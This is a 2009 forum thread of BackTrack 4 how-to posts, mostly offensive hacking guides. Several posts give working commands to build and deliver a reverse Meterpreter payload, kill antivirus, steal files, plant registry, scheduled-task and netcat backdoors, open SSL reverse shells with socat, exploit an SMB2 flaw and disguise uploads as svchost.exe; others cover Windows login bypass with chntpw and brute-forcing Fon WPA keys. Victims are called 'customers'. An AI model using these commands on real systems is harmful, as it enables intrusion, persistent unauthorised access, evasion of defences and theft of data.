Remote Exploit Forums - BackTrack 4 Howto

Another TuT on metasploit. All my cheat notes :)

ecsployt — Wed, 11 Nov 2009 01:10:35 GMT

I introduce my tutorial on the Metasploit Framework. This applys to both Linux and Windows.
Although, I would seriously suggest using Metasploit within Linux, specifically
'Backtrack 4 - PreRelease' (The Latest)

If you dont know what the metasploit framework is, then look it up. You've been missing out.

In no way is this meant to be a comprehensive guide. MSF is HUGE. Too many things can be done with it,
you could write 15 books on it. MSF is Open Source and coded in the Ruby language.

Get used to the 'help' option!

PAYLOADs
========

I'm gonna start with Payloads, many people know already that MSF is an exploitation framework, as in you can
work out vulnerabilities in software, and use the framework to quickly create working exploits for it.
There's hundreds of payloads that you can choose from, so that when you exploit the system in question
you can easily automate the execution of a payload of your choice on the machine.

I will show you how to turn those payloads into an actual .EXE so it will just run as is.

Ok. Lets begin:

Fire up your MSF, make sure it's updated, as they are constantly making amendments to this.
For backtrack i think its : cd pentest/exploits/framework3

Metasploit Double Encoded Reverse Meterpreter Payload
================================================== ===

$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=123.234.456.678 LPORT=82 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /meterpreter_reverse.exe

LHOST - is our machine (listening host, as we are waiting for a connection from RHOST (remote host)

LPORT - self explanitory. Just make sure you have port forwarding set up on your router ofcourse.

Meterpreter - An incredibly advanced shell which kind of simulates bash. (even on a win system) - lots of power.
You'll see how much power shorty.

Now you have your PAYLOAD.exe

Metasploit Listener
===================

In /framework3 directory

$ ./msfconsole
(Takes a lil minute for this to load)

use exploit/multi/handler (Sets the exploit to a handler)
set PAYLOAD windows/meterpreter/reverse_tcp (Most common Payload to use, try experimenting with others)
set LHOST 192.162.1.50 (Make sure you set LHOST to your address on Network and not localhost)
set LPORT 82 (Sometimes, port 80, 443 or 8080 is better as to some FW's it looks less suspicious)
set ExitOnSession false (As soon as you get a session, it doesn't automatically jump in to it)
set AutoRunScript /killav.rb (when customer connects back, and meterpreter payload is uploaded, killav.rb script is uploaded and executed)
exploit -j (sets exploit up as a job, good for shells on multiple customers)

(See more on scripts... down )

Continuation
============

When all goes well, and you have hit 'exploit -j' and have waited for a customer to click on the payload.exe you created earlier
you will see stuff happening in the screen. You will notice it run the killab script, then says something like :

Meterpreter session 1 opened (123.234.345.567:63456 -> 192.168.1.50:82)

Ok, here's the basics:

type :

sessions -l (this lists any sessions we have i.e. customers. Notice the lowercase L )
sessions -i 1 (this is to interact with the session 1. i.e. Interect. Lowercase I)

If you need to come out of this screen. Either CTRL+Z or type 'background' without the ''

Ok.. So we are in the session: Brilliant

Continuation - The Good Stuff
=============================

$ Meterpreter > getuid (this will show you currently logged in user)
$ Meterpreter > idletime (wanna see how long user has afk?)

$ Meterpreter > help (this will show you a massive list of amzing commands to use!)
$ Meterpreter > use priv (then check help again, more privilidged commands now eh?

ok i will show some really handy ones

$ Meterpreter > upload evil.exe evil.exe (uploads the file from this machine over to the customer)
$ Meterpreter > download secret.txt secret.txt (downloads the txt file to our machine)

$ Meterpreter > cd "Documents and settings" (cd's to a folder with spaces in it.)
$ Meterpreter > ls (this is an example of the bash type commands we have on the target win machine, version of dir)

$ Meterpreter > download -r �My Documents� /home/root/Documents (This would download the entire "My Docs" folder over to us.

$ Meterpreter > execute *f evil.exe (executed the file on the customer)

$ Meterpreter > execute *f cmd.exe *c *H *i (-f executes, cmd.exe shell on target, channelized, hidden, interactive)
(customer will not see a thing your doing as all the options are set properly)

Check down the bottom for some useful cmd.exe commands that are very useful

$ Meterpreter > uictl disable keyboard (disables some user interface componants)
$ Meterpreter > uictl disable mouse
$ Meterpreter > uictl enable keyboard (enables)

$ Meterpreter > ps (this will show you a detailed list of all processes running on target machine)

$ Meterpreter > migrate pid (migrates/injects itself into another process id) e.g migrate 716 (explorer.exe)
$ Meterpreter > kill pid (kills process) e.g. kill 563 (av.exe goes down)

etc etc etc etc....

Using Payload As A Backdoor
===========================

upload /home/metabkdr.exe metabkdr.exe (to app data directory)

execute *-f cmd.exe *-c *-H -*i

Way 1 :
cmd.exe > REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe" /f

(This adds a registry startup obviously)
Way 2 :
cmd.exe > at 19:00 /every:M,T,W,Th,F cmd /c start "C:\Documents and Settings\Owner\Application Data\Microsoft\Installer\metabkdr.exe"

(runs backdoor at 7pm all weekdays, at command works for all windows i think)

way 3 :
cmd.exe > SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45
/TN FIREWALL /TR "C:\Documents and Settings\Owner\Application Data\Microsoft\Ins
taller\metabkdr.exe" /ED 11/11/2011

(This runs the backdoor every 45 mins as SYSTEM (on XP. XP home doesnt have schtask, has 'at' though)

Plant A Simple Backdoor with Netcat
===================================

plant a backdoor
A very simple way of planting backdoor could be using netcat.
steps:
1. upload a netcat executable (nc.exe) on remote machine.
meterpreter provides a command 'upload' for that
2. c:\windows\system32 > nc.exe -l -L -p -e cmd.exe
3. now from your machine, type nc -v -n
It will give you a command shell of remote machine

nc -l -d -p 80 -e c:\windows\system32\cmd.exe

More On Scripts:
================

Scripts can be run from the meterpreter shell when you have a shell on a customer.

All you do is: (where '$' is not to be typed. This is the bash shell)

$ run scraper -h (This will show you the options etc for any of the scripts)
or
$ run keylogrecorder -h

The Sky is your limit when it comes to scripts. You can code them to do all sorts of stuff for you.
There are many already within the the framework, made by folk.. here's a small list of some already there:

killav.rb (kills all anti viruses running on system)
getcountermeasure.rb (kills av's and fw's/ids')
scraper.rb (logs LOADS of useful information via a serious of automated commands on customer. Logs stored in /root/.msf3/
gettelnet.rb (able to open a telnet server on the customer with a username and password)
checkvm.rb (checks to see if it is a VM. And version numbers)

netenum.rb
search_dwld.rb
winbf.rb
credcollect.rb
hostsedit.rb
remotewinenum.rb
keylogrecorder.rb
scheduleme.rb
winenum.rb
getgui.rb
schtasksabuse.rb
wmic.rb
get_local_subnets.rb
migrate.rb

Credits: backtrack forums / metasploit /irongeek

how to upgrade Spoonwep2-rc2 to Spoonwep2-rc3

apprentice — Sat, 07 Nov 2009 12:02:38 GMT

i gotta say thanks for FRHACK thats where i seen this and a few other places

first download spoonwep-wpa-rc3.deb

http://www.fileden.com/files/2008/10...ep-wpa-rc3.deb

then download aircrack-ng-1.0-rc3

http://download.aircrack-ng.org/arch...1.0-rc3.tar.gz

once downloaded go into synaptics or dpkg -r aircrack-ng

untar aircrack-ng

make sqlite=true unstable=true
make sqlite=true unstable=true install

just simply dpkg -i spoonwep-wpa-rc3.deb

and thats it , it will create some desktop shortcuts which are nice

i have tested this new one and it cracks wep faster

you can also configure it with whichever version your using
latest aircrack-ng 1.0 rc4 and aircrack-ng 1.0 final if you are using, spoonwep need to change it slightly.

vi /usr/bin/spoonwep vi / usr / bin / spoonwep

(略) (Omitted)
ln -sf bash /bin/sh ln-sf bash / bin / sh
/etc/init.d/NetworkManager stop >/dev/null 2>&1 / etc / init.d / NetworkManager stop> / dev / null 2> & 1
aircrack_edition=`aircrack-ng --help|grep "Aircrack-ng 1.0"|awk '{print $3}'` aircrack_edition = `aircrack-ng - help | grep" Aircrack-ng 1.0 "| awk '(print $ 3)'`
# if [ "$aircrack_edition" = "rc3" ];then # If [ "$ aircrack_edition" = "rc3"]; then
rc3 & rc3 &
# fi # Fi
(略) (Omitted)

Rc3 so if this statement only unbeaten, 16 and 18 lines like the above comment out of line (#) to.

BT4 Pre Final As VMware Client

rayj00 — Sun, 01 Nov 2009 23:44:12 GMT

I have installed BT4 as a VMware guest VM. Seems to working fine with a slight exception. When I fire up Wireshark, there are no Capture Interfaces listed? They should come up automatically inside Wireshark.

Any ideas?

Thanks
Ray
Windows 7 64 bit Host - VMware BT4 Guest

Steganography on the fly

prowl3r — Thu, 29 Oct 2009 14:31:03 GMT

My brother just asked me to send him some sensitive information. I decided to hide the info in a mail attachment. So I'll be sharing this with you.

First I installed steghide from the repositories.

Code:

root@wireless-service:~/secrets# cat /etc/issue

BackTrack 4 PwnSauce \n \l



root@wireless-service:~/secrets# uname -a

Linux wireless-service 2.6.30.5 #1 SMP Wed Aug 26 16:47:02 EDT 2009 i686 GNU/Linux

root@wireless-service:~/secrets# aptitude install steghide

Reading package lists... Done

Building dependency tree

Reading state information... Done

Reading extended state information

Initializing package states... Done

The following NEW packages will be installed:

  libmcrypt4{a} libmhash2{a} steghide

0 packages upgraded, 3 newly installed, 0 to remove and 0 not upgraded.

Need to get 384kB of archives. After unpacking 1176kB will be used.

Do you want to continue? [Y/n/?] y

Writing extended state information... Done

Get:1 http://archive.offensive-security.com pwnsauce/universe libmcrypt4 2.5.7-5ubuntu1 [81.2kB]

Get:2 http://archive.offensive-security.com pwnsauce/main libmhash2 0.9.9-1 [133kB]

Get:3 http://archive.offensive-security.com pwnsauce/universe steghide 0.5.1-9 [170kB]

Fetched 384kB in 2s (185kB/s)

Selecting previously deselected package libmcrypt4.

(Reading database ... 205446 files and directories currently installed.)

Unpacking libmcrypt4 (from .../libmcrypt4_2.5.7-5ubuntu1_i386.deb) ...

Selecting previously deselected package libmhash2.

Unpacking libmhash2 (from .../libmhash2_0.9.9-1_i386.deb) ...

Selecting previously deselected package steghide.

Unpacking steghide (from .../steghide_0.5.1-9_i386.deb) ...

Processing triggers for man-db ...

Setting up libmcrypt4 (2.5.7-5ubuntu1) ...



Setting up libmhash2 (0.9.9-1) ...



Setting up steghide (0.5.1-9) ...

Processing triggers for libc6 ...

ldconfig deferred processing now taking place

Reading package lists... Done

Building dependency tree

Reading state information... Done

Reading extended state information

Initializing package states... Done

Writing extended state information... Done

root@wireless-service:~/secrets#

Then I got a .jpg file and put the info inside a .txt file.

Code:

root@wireless-service:~/secrets# ls -l

total 72

-rw-r--r-- 1 root root 65140 Oct 29 13:35 pills.jpg

-rw-r--r-- 1 root root  1689 Oct 29 13:41 secret.txt

root@wireless-service:~/secrets#

I checked how much info I can insert for this particular image file. The bigger the file, the more info you can drop into it.

Code:

root@wireless-service:~/secrets# steghide info pills.jpg

"pills.jpg":

  format: jpeg

  capacity: 2.3 KB

Try to get information about embedded data ? (y/n) n

root@wireless-service:~/secrets#

Now, inject the data into the image.

Code:

root@wireless-service:~/secrets# steghide embed -cf pills.jpg -ef secret.txt

Enter passphrase:

Re-Enter passphrase:

embedding "secret.txt" in "pills.jpg"... done

root@wireless-service:~/secrets# ls -l

total 52

-rw-r--r-- 1 root root 46852 Oct 29 13:50 pills.jpg

-rw-r--r-- 1 root root  1689 Oct 29 13:41 secret.txt

root@wireless-service:~/secrets#

To decode and extract the file:

Code:

root@wireless-service:~/secrets# rm secret.txt

root@wireless-service:~/secrets# ls -l

total 48

-rw-r--r-- 1 root root 46852 Oct 29 13:50 pills.jpg

root@wireless-service:~/secrets# steghide extract -sf pills.jpg

Enter passphrase:

wrote extracted data to "secret.txt".

root@wireless-service:~/secrets# ls -l

total 52

-rw-r--r-- 1 root root 46852 Oct 29 13:50 pills.jpg

-rw-r--r-- 1 root root  1689 Oct 29 13:51 secret.txt

root@wireless-service:~/secrets#

"A picture is worth a thousand words"

Advanced server ssl shell shoveling AND "Gender-Bender"

vvpalin — Thu, 29 Oct 2009 05:42:12 GMT

Ok we all know what a reverse shell is rite? .. If you don't go play a video game or something, i hear pokemon is pretty cool and stuffs. :o

So a basic shell shovel goes like this.

nc 192.168.1.100 4444 -e /bin/sh

That is FAR from secure in any way, shape, or form. However fydoor of nmap released a wonderful little tool called ncat, its basically the 2009 version of nc. Anyways one of its many features is ssl. So rather than the above command we can do something like so.

ncat --ssl 192.168.1.100 4444 -c /bin/sh

Sweet your thinking, now i can use that. STOP back the f*ck up. All i or anyone else has to do is mitm you because we have the exact same certs. Even if you create your own and specify the --ssl-trustfile it looks for OS certs ... soooo not cool

Low and behold after many a nights with nc, ncat, cryptcat, and a few others i came across something so powerfull it will make your head spin. Allow myself to introduce ... um mysyself? Heh no .. have a fine look at socat, now ill warn you before i say anything else. Socat is so advanced and comes with so many options and switches that i still refer to the man page just about every time i use it. First before we do anything else we are going to generate some certificates to use.

Quote:

root@ph33r:~# mkdir certs
root@ph33r:~# cd certs
root@ph33r:~/certs# openssl genrsa -out server.key 2048
Generating RSA private key, 2048 bit long modulus
..........+++
...........+++
e is 65537 (0x10001)
root@ph33r:~/certs# openssl req -new -key server.key -x509 -days 365 -out server.crt
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (eg, YOUR name) []:
Email Address []:
root@ph33r:~/certs# cat server.key server.crt > server.pem
root@ph33r:~/certs# chmod 600 server.key server.pem
root@ph33r:~/certs#

Noticed how i left all the fields blank?? You dont need to input anything for your own personal certs.

We also need to do the exact same thing for the client certs we are going to use so just switch the names around like so.

Quote:

openssl genrsa -out client.key 2048
openssl req -new -key client.key -x509 -days 365 -out client.crt
cat client.key client.crt > client.pem
chmod 600 client.key client.pem

Dont be a damn fool and not chmod them on whatever box you will be using ;)

Now then its rather simple

copy server.pem and client.crt to the server - "sender"
and
copy server.crt and client.pem to the client - "receive"

Let me quickly say you can just cat them into your file on whatever box, there not anything special just open them with a text editor and find out. Now lets go about setting up a reverse shell. Pay attention because this is where it gets tricky.

First we want to set up the listener so lets do that real fast.

Quote:

root@ph33r:~/certs# socat - ssl-l:4444,cert=client.pem,cafile=server.crt,verify=1

Ill explain it all in just a moment after we have our first connect so bare with me.

Now on our "server" we do this

Quote:

root@fookd:~# socat ssl:12.120.55.8:4444,cert=server.pem,cafile=client .crt exec:"/bin/sh"

Back on our client we are NOT going to notice anything happened at all, but give it this and with any luck...

Quote:

root@ph33r:~/certs# socat - ssl-l:4444,cert=client.pem,cafile=server.crt,verify=1
id
uid=0(root) gid=0(root) groups=0(root)

w00t we have a very very nice secure shell now and can do almost anything :D

Ok still with me?

Lets break all this down a little first before we keep going. Did you notice on our "client" how directly after we typed socat there was a "-"? In socat the "-" stands for stdio or standard input output. That basically means just read whatever we type and bass it to the ssl-l. Notice the -l? that stands for listen. You really should be reading the man page by now but ill explain a little more. How many of you have ever used netcat like this "nc -lp 4444 | nc 192.168.1.1 9999" socat works along the same lines, in that it always needs 2 addresses, or 2 things to do. So in the server command if you notice there was a space before exec:"/bin/sh". Starting to get the picture now? There is one other thing i want to mention before moving on. In the above piped netcat command data can only travel one way ---> this way. With socat data can travel each way <--> you will see what im talking about later on but keep that in mind.

Lets improve one our secure shell a little, as if our listener goes down or isnt up then we are screwed. Also wouldn't it be nice if we could have it remember our commands so we can type up if we want to repeat something. All are possible with the mighty socat :D

server

Quote:

root@fookd:~# socat ssl:12.120.55.8:443,cert=server.pem,cafile=client. crt,fork,forever,intervall=60,ignoreeof,verify=1,s ourceport=15541 exec:"/bin/sh" &
root@fookd:~#

client

Quote:

root@ph33r:~/certs# socat -d -d READLINE,history=history.txt,append ssl-l:443,cert=client.pem,cafile=server.crt,verify=1,r euseaddr
2009/10/28 23:46:36 socat[13911] N using readline on stdin for reading and stdio for writing
2009/10/28 23:46:36 socat[13911] N listening on AF=2 0.0.0.0:443
2009/10/28 23:47:23 socat[13911] N accepting connection from AF=2 12.120.55.8:15541 on AF=2 10.10.10.10:443
2009/10/28 23:47:23 socat[13911] N SSL connection using AES256-SHA
2009/10/28 23:47:23 socat[13911] N starting data transfer loop with FDs [0,0] and [5,5]
id
uid=0(root) gid=0(root) groups=0(root)

Ok first .. if you noticed it ... dont say it, but a little explanation on both commands quickly before i move on. On the server due to the "forever,intervall=60" will let us always get a shell :D and with ignoreeof if we cntrl+c out if it, its not going to die .. we also changed the source port .. very handy.

On the client, you probably noticed all the extra info we have. That is because of the -d -d .. that is basically the same thing as - vv in ncat or nc. We then used readline, and setup a history file, so now we can just press up to recall whatever commands we want. We also used reuseaddr so if we kill the connection we don't have to wait for our box to release the socket before we can reuse it.

There is TONS more we can do, and i have gotten pretty damn crazy with it lately but i want to move on so start reading that man page if you want to improve .. atho feel free to post your commands if you like as im always looking for something new.

Gender Benders = next post, and this will be edited.

Boot Back Track 4 pre final on HDD (without install)

ittdg — Tue, 27 Oct 2009 05:27:54 GMT

Let's create boot Back Track 4 pre final on HDD(without install)

-First step: Create the Grub4dos menu:

1. Use Install Grub4dos on Windows V0.2.exe
download at : h**p://***.mediafire.com/?jmoyognq31i
Run file Install Grub4dos on Windows V0.2.exe and Brower to iso file
(bt4-pre-final.iso) to copy this iso file /FREE4VN and create menu.lst on C:
2. If you use Windows Vista/Seven, then need run bcd_edit.cmd to add Grub menu on bootmgr of Windows Vista/7

- Second:

1.Extract iso file (bt4-pre-final.iso) to C: (include: /Casper and /Boot)
2.Delete file bt4-pre-final.iso on /FREE4VN
2.Edit file menu.lst on C:

gfxmenu /FREE4VN/message
configfile /FREE4VN/menu_old.lst

title BackTrack4 Pre Final
kernel (hd0,0)/boot/vmlinuz BOOT=casper boot=casper nopersistent rw quiet vga=0x317
initrd (hd0,0)/boot/initrd.gz

- Finally,reboot computer to have fun!

Changing Apache and SSH banner

vvpalin — Mon, 26 Oct 2009 18:58:39 GMT

When i was going through the offsec course and took my test.. dare i admit it, but after i was finished i decided to give the rest of the range a indepth scan. Immediately i noticed that there was another BT box on the wire ... how you ask? By looking at the default apache banner.

This is what it looks like every time you fire it up.

Quote:

root@ph33r:~# nmap -sV 192.168.0.222
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.9 ((Ubuntu) PHP/5.2.6-bt0 with Suhosin-Patch)
Service Info: Host: local; OS: Linux
root@ph33r:~#

So it got me thinking, if im out on a pentest and some crafty admin decides to give me a sweep hes going to notice rite away what OS im running. While it might not do much since there is no exploit as of yet ... knowldge is power plain and simple .. and id rather keep that knowldge in my hands.

So lets modify our default banner. These simple lines are all that you need.

Quote:

sed -i 's/ServerTokens Full/ServerTokens Prod/' /etc/apache2/conf.d/security
sed -i 's/TraceEnable On/TraceEnable Off/' /etc/apache2/conf.d/security
sed -i 's/ServerSignature On/ServerSignature Off/' /etc/apache2/conf.d/security

Now lets look at our banner ;)

Quote:

root@ph33r:~# nmap -sV 192.168.0.222
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
Service Info: Host: local; OS: Linux
root@ph33r:~#

While we are at it lets give everyone that logs into our ssh a friendly welcome message.

Quote:

echo "Can you smell that?" > /etc/motd
echo "Welcome to the vag box!" > /etc/ssh/sshd-banner
echo "Banner /etc/ssh/sshd-banner" >> /etc/ssh/sshd_config

The before

Quote:

me@lappy:~# ssh root@192.168.0.222
root@192.168.0.222's password:
BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution
root@ph33r:~#

The after

Quote:

me@lappy:~# ssh root@192.168.0.222
Can you smell that?
root@192.168.0.222's password:
Welcome to the vag box!
root@ph33r:~#

While the above is rather harmless to your system the below can quickly bork your sshd. Personally i had had no problems but let this serve as a warning.
YOU CAN SCREW THINGS UP!

Ok so lets ncat into our host on 22 and see what we have.

Quote:

me@lappy:~# ncat 192.168.0.222 22
SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1

Cool no exploits or anything but lets edit it just for fun. First lets make a copy of sshd to work with.

Quote:

root@ph33r:~# mkdir tmp
root@ph33r:~# cd tmp
root@ph33r:~/tmp# cp /usr/sbin/sshd .

Now let modify it.

Quote:

root@ph33r:~/tmp# hexedit sshd

Ok a blue window should have popped up, now look at the bottom and notice the commands. We want to use search so press control+w make sure "Search for text string" is in white hit enter. Now type "OpenSSH" hit enter and you will be directed to the exact part you need to modify.

It will look like this, just change everything that is in red to 0 and you will end up with what i have below. If you want to type something else Press TAB and type what you want into the ascii part, just remember there is no backspace.

Quote:

00053FE0 6E 64 2D 6C 69 6E 65 00 4F 70 65 6E 53 53 48 5F nd-line.OpenSSH_
00053FF0 35 2E 31 70 31 20 44 65 62 69 61 6E 2D 33 75 62 5.1p1 Debian-3ub
00054000 75 6E 74 75 31 00 25 73 2C 20 25 73 0A 00 4B 52 untu1.%s, %s..KR

It should now look like this.

Quote:

00053FE0 6E 64 2D 6C 69 6E 65 00 4F 70 65 6E 53 53 48 00 nd-line.OpenSSH.
00053FF0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00054000 00 00 00 00 00 00 25 73 2C 20 25 73 0A 00 4B 52 ......%s, %s..KR

When your done hit control+x to save it, and give it a launch, remember it requires the exact path.

Quote:

root@ph33r:~/tmp# /root/tmp/sshd
root@ph33r:~/tmp# ncat localhost 22
SSH-2.0-OpenSSH

Just make sure you can connect to it and your good to go.

Quote:

killall sshd
rm /usr/sbin/sshd
mv /root/tmp/sshd /usr/sbin/

Enjoy!

Meta "Pivot" Scanning - and other usefull junk

vvpalin — Mon, 26 Oct 2009 08:56:06 GMT

I apologize if this is written some other place but i found it rather usefull. I took the last few months off to do some really heavy learning and its been a long time since i wrote a guide so honestly im just trying to get my hands dirty before i start writing some more in depth stuff.
A word to the wise, while there is a way to scan directly through a pivot and it has its advantages, let me tell you something from experience, not only is it slow, but its also highly unreliable. More than a few times it has crashed my session or failed to pick up known open ports.

All that being said lets get started.

First you need to go here and download the .zip
Downloads - pivot-scan - Project Hosting on Google Code

Now for the install

Quote:

unzip pivotscan_rb.zip
sed -i 's/(Yes)/(,)/' pivot-scan.rb
sed -i 's/sl -q 1000 -s -c 3/sl -q 1000 -s -c 1000/' pivot-scan.rb
mv pivot-scan.rb /pentest/exploits/framework3/scripts/meterpreter/

### The above sed commands are fairly important otherwise you wont be seeing everything you should.

Lets loadup msfconsole and find us a vulnerable host :D

I managed to find myself a nice and juicy unpatched vista smb2 exploit to use on 192.168.10.104 so ...

Quote:

msf > use scanner/smb/smb2

msf auxiliary(smb2) > set rhosts 192.168.10.104
rhosts => 192.168.10.104

msf auxiliary(smb2) > run
[*] 192.168.10.104 supports SMB 2 [dialect 2.2] and has been online for 87 hours[*] Auxiliary module execution completed
msf auxiliary(smb2) >

Now lets cross our fingers

Quote:

msf ) > use windows/smb/smb2_negotiate_func_index

msf > set rhost 192.168.10.104
rhost => 192.168.10.104

msf > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf > set lhost 192.168.10.126
lhost => 192.168.10.126

msf > set lport 445
lport => 445

msf > set ExitOnSession false
ExitOnSession => false

msf > exploit -j
[*] Started reverse handler
[*] Connecting to the target (192.168.10.104:445)
[*] Sending the exploit packet (872 bytes)
[*] Waiting up to 180 seconds for exploit to trigger
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.10.126:445 -> 192.168.10.104:49208)

msf > sessions -v
Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Meterpreter 192.168.10.126:445 -> 192.168.10.104:49208 windows/smb/smb2_negotiate_func_index

msf >

Sweet!! now we have our nicely exploited pc so lets do a little maintaince then move onto the scanning :p

Quote:

msf > sessions -i 1
[*] Starting interaction with 1

meterpreter > sysinfo
Computer: WIN-BPTA72KBDYU
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
Language: en_US

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run persistence -X -i 60 -r 192.168.10.126 -p 8080
[*] Creating a persistent agent: LHOST=192.168.10.126 LPORT=8080 (interval=60 onboot=true)
[*] Persistent agent script is 47309 bytes long
[*] Uploaded the persistent agent to C:\Windows\TEMP\oFVccxSg.vbs
[*] Agent executed with PID 3904
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run \UrKohmHN
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run \UrKohmHN

meterpreter >

Now that we have a persistent backdoor incase something fails lets start our scanning.

Quote:

meterpreter > run pivot-scan.rb -a
[*] Created by Augusto Pereyra aepereyra at gmail.com
[*] Uploading Portscanner
[*] Performing portscanning for IP range 192.168.10.1-192.168.10.254

-------------------------------------
192.168.10.104,"",0,0,"Yes","135 139 445 3389","123 137 138 500 1900"
-------------------------------------
192.168.10.142,"",0,0,"No","21 22 25 79 80 88 110 135 139 445 1025 1433 3389",""
-------------------------------------
meterpreter >

There are a few other ways we can do this also, the first simple way is like so.

Quote:

meterpreter > upload /pentest/windows-binaries/scanners/sl.exe c:\\windows\\system32\\
[*] uploading : /pentest/windows-binaries/scanners/sl.exe -> c:\windows\system32\
[*] uploaded : /pentest/windows-binaries/scanners/sl.exe -> c:\windows\system32\\sl.exe

meterpreter > execute -f cmd.exe -c -H -t
Process 3804 created.
Channel 3 created.

meterpreter > interact 3
Interacting with channel 3...

Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows\system32> sl -s 192.168.10.1-254
sl -s 192.168.10.1-254
Scan of 254 IPs started at Sun Oct 25 22:49:11 2009
192.168.10.104,"",0,0,"Yes","135 139 445 3389","123 137 138 500 1900"
192.168.10.142,"",0,0,"No","21 22 25 79 80 88 110 135 139 445 1025 1433 3389",""
-------------------------------------------------------------------------------
C:\Windows\system32> exit
meterpreter >

Ok so on to the last method, first we need to do just a small little change however. It isnt necessary but ill explain.

Quote:

cd /pentest/exploits/framework3/scripts/meterpreter/
sed -i 's/svhost#{rand(100)}/svchost/' uploadexec.rb
sed -i 's/prin_status/print_status/' uploadexec.rb
sed -i 's/TEMP/WINDIR/g' uploadexec.rb

Ok first command changes what you upload from something like svhost11.exe to svchost.exe .. why you ask?? Well 2 reasons one its less obvious, but the more important is because you can not kill anything named svchost.exe .. just try renaming calc.exe and find out. The second is to fix a bug which hopefully within the next day or so will be updated, and the last command just changes our default dir to the default c:windows.

Quote:

meterpreter > run uploadexec -e /pentest/windows-binaries/scanners/sl.exe -o "-s 192.168.10.1-254" -v -r
[*] Running Upload and Execute Meterpreter script....
[*] Uploading /pentest/windows-binaries/scanners/sl.exe....
[*] /pentest/windows-binaries/scanners/sl.exe uploaded!
[*] Uploaded as C:\Windows\svchost.exe
[*] Running command C:\Windows\svchost.exe

192.168.10.104,"",0,0,"Yes","135 139 445 3389","123 137 138 500 1900"
192.168.10.142,"",0,0,"No","21 22 25 79 80 88 110 135 139 445 1025 1433 3389",""
[*] Deleting C:\Windows\svchost.exe
[*] Finnished!
meterpreter >

Easiest way to use chntpw for login bypass

Isohump — Sun, 25 Oct 2009 07:02:32 GMT

Hi every one well just before i go on telling u guys how to use chntpw to bypass login.

If anyone here nows how to use it other than bypassing login i would love a nice tutorial or some info about fixing the registry with it.

OH by the way your not gonna need to hive anything ^_^

Ok so let's get started first of all make sure u have your hard drive mounted if u dont know how to do that google it....

After thats all done u need to get into the...

Code:

cd /mnt/Your hard folder/Windows/System32/config

Note it is case sensitive if you don't know how you're folder are use the ls feature!!!!

Now u should be in config use the ls feature like I've mentioned before and find your sam file not anything like sam.log or anything else JUST SAM it will either be sam or SAM...

While your still in your Windows/system32/config directory type this command this is how mine looked like

Code:

root@Expl0it3:/mnt/sda1/Windows/System32/config# chntpw -i sam

and thats it the rest should explain it's self..

Note i recommend u clear the password instead of changing it.. and after u clear it i strongly recommend u pick the user witch u cleared the password for and choose option number 4 Unlock and enable user account) [seems locked already]..

And thats it ^_^

!!!!!!!!PLEASE COMMENT ITS THE LEAST YOU CAN DO!!!!!!!!!

How to Bruteforce a WPA Fon Wlan

Reeth — Sat, 24 Oct 2009 13:31:34 GMT

Hey Community,

In this little Tutorial i'm gonna show you, hot to Bruteforce nearby Fon Routers

So the interesting thing which I note, is that a Fon AP's default WPA passphrase is it's serial number, printed under the box. These serial numbers are sequential, thus making it very easy to guess their entire range.

So for this i use a little Perl Script, which generates a file, included all Numbers from 807200000 till 8702555555

Code:

#!/usr/bin/perl

$n = 8702000000;

while ($n <= 8702555555) { system ("echo $n >> numbers.txt"); $n++; }

So then we need a WPA Handshake to try out. I'm not gonna describe how you get one ;) because there are million Posts about it.

Then we Simply use Aircrack and start Bruteforcing

aircrack-ng fon-01.cap -w /root/fon/numbers.txt

So this is it :) Cracked.

IF you have further questions feel free to a PM or visit my Blog.
In German = My_0wn_Remote
In English = my_english_remote

I also created a littel Tutorial Video for this whole thing

YouTube - How to Bruteforce a nearby WPA Fon Wlan [3]

Maybee it is worth for the Video Section, i can't measure

=) Reeth

Command Line Fun: Quickly burn a folder to disc

Virchanza — Fri, 23 Oct 2009 16:29:20 GMT

********************************
For information on how to install cdrtools, take a look at the 2nd post in this thread
*********************************************

You can make an ISO file out of a folder as follows:

Code:

mkisofs -fRrlJ -A Disc_Volume_Label_Goes_Here -o name_of_iso_file.iso name_of_folder

You can burn an ISO file to disc as follows:

Code:

cdrecord dev=/dev/hda name_of_iso_file.iso

But if you don't want to waste time and disk space creating an ISO file, you pipe the output of mkisofs into the input of cdrecord (yes it's as cool as it sounds). As follows:

Code:

mkisofs -fRrlJ -A Disc_Volume_Label -o - name_of_folder | sudo cdrecord dev=/dev/hda -

(Note that I've replaced the input and output file names with hyphens)

On some systems, including my own, this final command fails because cdrecord wants to be told the track size (maybe some drives won't start burning unless they know the track size?). If anyone has any info on this, get back to me in this thread and we can troubleshoot it. Maybe we could do something like:

Code:

mkisofs -fRrlJ -A Disc_Volume_Label -o - name_of_folder | sudo cdrecord -tsize=`some_command_that_will_get_the track_size_for_us` dev=/dev/hda -

Also if I've made any errors post back quickly and I'll fix it.

I got all my info from this site:

Command-line CD-ROM burning in Linux

